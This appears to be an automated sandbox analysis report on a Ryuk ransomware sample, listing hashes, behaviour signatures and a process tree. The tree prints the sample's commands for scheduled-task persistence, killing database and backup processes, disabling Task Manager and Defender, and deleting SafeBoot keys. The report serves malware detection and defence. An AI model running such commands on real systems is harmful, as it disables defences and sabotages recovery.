Analysis

Max time kernel: 137s
Max time network: 144s
Platform: windows10-2004_x64
Resource: win10v2004-20230703-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 19-07-2023 14:04

Static task: static1

Behavioral task: behavioral1
  Sample: ecd9d8ef99eb98exe_JC.exe
  Resource: win7-20230712-en

Behavioral task: behavioral2
  Sample: ecd9d8ef99eb98exe_JC.exe
  Resource: win10v2004-20230703-en
General

Target: ecd9d8ef99eb98exe_JC.exe
Size: 889KB
MD5: ecd9d8ef99eb9813fa4eced549ea4d88
SHA1: 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256: fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA512: 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b
SSDEEP: 12288:GFGYwyCMcRzRjWYgeWYg955/155/KQurE+HG8dSyjCtRronBeSrBa:GFGYtSNBQKEmG8HjCXrUVa
Malware Config

Extracted: C:\ProgramData\RyukReadMe.txt
Signatures

- Ryuk
  Ransomware distributed via existing botnets, often Trickbot or Emotet.

- Renames multiple (60) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.

- Renames multiple (7863) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.

- Disables Task Manager via registry modification

- Drops startup file (3 IoCs)
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe | cmd.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe | cmd.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe | attrib.exe

- Modifies file permissions (1 TTPs, 1 IoCs)
  pid | Process
  2168 | icacls.exe

- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  description | ioc | Process
  File opened (read-only) | \??\E: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\K: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\Q: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\R: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\S: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\T: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\U: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\G: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\L: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\N: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\B: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\X: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\Y: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\M: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\O: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\P: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\W: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\F: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\H: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\I: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\J: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\A: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\V: | ecd9d8ef99eb98exe_JC.exe
  File opened (read-only) | \??\Z: | ecd9d8ef99eb98exe_JC.exe

- Drops file in Program Files directory (64 IoCs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Creates scheduled task(s) (1 TTPs, 4 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  4364 | schtasks.exe
  560 | schtasks.exe
  2472 | schtasks.exe
  3780 | schtasks.exe

- Kills process with taskkill (2 IoCs)
  pid | Process
  3828 | taskkill.exe
  3336 | taskkill.exe

- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process
  636 | ecd9d8ef99eb98exe_JC.exe (the same row is reported 64 times)

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 3828 | taskkill.exe
  Token: SeDebugPrivilege | 3336 | taskkill.exe

- Suspicious use of WriteProcessMemory (64 IoCs)
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

- Views/modifies file attributes (1 TTPs, 3 IoCs)
  pid | Process
  2704 | attrib.exe
  3940 | attrib.exe
  2268 | attrib.exe
Processes

C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe (PID 636, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe (PID 5076, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\schtasks.exe (PID 4364, depth 3)
      Command line: schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      - Creates scheduled task(s)

  C:\Windows\system32\cmd.exe (PID 2060, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    - Drops startup file

  C:\Windows\system32\cmd.exe (PID 3408, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

  C:\Windows\system32\cmd.exe (PID 2052, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\schtasks.exe (PID 560, depth 3)
      Command line: schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
      - Creates scheduled task(s)

  C:\Windows\system32\cmd.exe (PID 3812, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\attrib.exe (PID 2704, depth 3)
      Command line: attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      - Drops startup file
      - Views/modifies file attributes

  C:\Windows\system32\cmd.exe (PID 4348, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\schtasks.exe (PID 2472, depth 3)
      Command line: schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F
      - Creates scheduled task(s)

  C:\Windows\system32\cmd.exe (PID 2040, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\schtasks.exe (PID 3780, depth 3)
      Command line: schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F
      - Creates scheduled task(s)

  C:\Windows\system32\cmd.exe (PID 1584, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\attrib.exe (PID 3940, depth 3)
      Command line: attrib +h +s ryuk.exe
      - Views/modifies file attributes

  C:\Windows\system32\cmd.exe (PID 4852, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\attrib.exe (PID 2268, depth 3)
      Command line: attrib +h +s C:\ProgramData\ryuk.exe
      - Views/modifies file attributes

  C:\Windows\system32\cmd.exe (PID 4816, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe (PID 4392, depth 3)
      Command line: cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\icacls.exe (PID 2168, depth 4)
        Command line: icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        - Modifies file permissions

  C:\Windows\system32\cmd.exe (PID 3344, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe (PID 4572, depth 3)
      Command line: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

  C:\Windows\system32\cmd.exe (PID 3720, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe (PID 1380, depth 3)
      Command line: cmd.exe /c taskkill /t /f /im sql*
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\taskkill.exe (PID 3336, depth 4)
        Command line: taskkill /t /f /im sql*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\taskkill.exe (PID 3828, depth 3)
      Command line: taskkill /f /t /im veeam*
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\cmd.exe (PID 3728, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

  C:\Windows\system32\cmd.exe (PID 4160, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

  C:\Windows\system32\cmd.exe (PID 4996, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

  C:\Windows\system32\cmd.exe (PID 3688, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

  C:\Windows\system32\cmd.exe (PID 3788, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

  C:\Windows\system32\cmd.exe (PID 4440, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe (PID 5060, depth 3)
      Command line: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

  C:\Windows\system32\cmd.exe (PID 4984, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe (PID 1100, depth 3)
      Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

  C:\Windows\system32\cmd.exe (PID 3064, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

    C:\Windows\system32\reg.exe (PID 5108, depth 3)
      Command line: reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

  C:\Windows\system32\cmd.exe (PID 2792, depth 2)
    Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

    C:\Windows\system32\reg.exe (PID 5068, depth 3)
      Command line: reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F